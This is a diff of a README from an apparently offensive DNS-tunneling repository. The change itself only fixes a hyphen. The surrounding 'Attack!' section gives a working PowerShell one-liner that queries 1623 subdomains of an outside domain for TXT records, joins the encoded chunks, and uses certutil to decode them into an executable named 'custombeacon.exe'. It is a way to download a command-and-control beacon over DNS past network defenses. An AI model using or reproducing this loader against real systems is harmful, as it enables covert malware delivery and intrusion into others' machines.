Octoberfest7/DNS_Tunneling/README.md

 ## Attack!

 We now need to run nslookup...
 1623 times.
 Less than ideal, but it's what we will do for now.
-We will use this powershell one liner in order to run nslookup for each subdomain and then select only the TXT record ($temp[5]) and then build $results as we go.  $results is then written to ./temp.txt, and finally certutil is used to decode temp.txt to custombeacon.exe.
+We will use this powershell one-liner in order to run nslookup for each subdomain and then select only the TXT record ($temp[5]) and then build $results as we go.  $results is then written to ./temp.txt, and finally certutil is used to decode temp.txt to custombeacon.exe.

 ```powershell
 $results="";for($num = 1; $num -le 1623 ; $num++){$temp = nslookup -type=TXT "$num.dns.edu....com" 2> $null;$temp = $temp[5].replace("`t","").replace("`"","");$results = $results + $temp};$results > ./temp.txt;certutil -decode ./temp.txt ./custombeacon.exe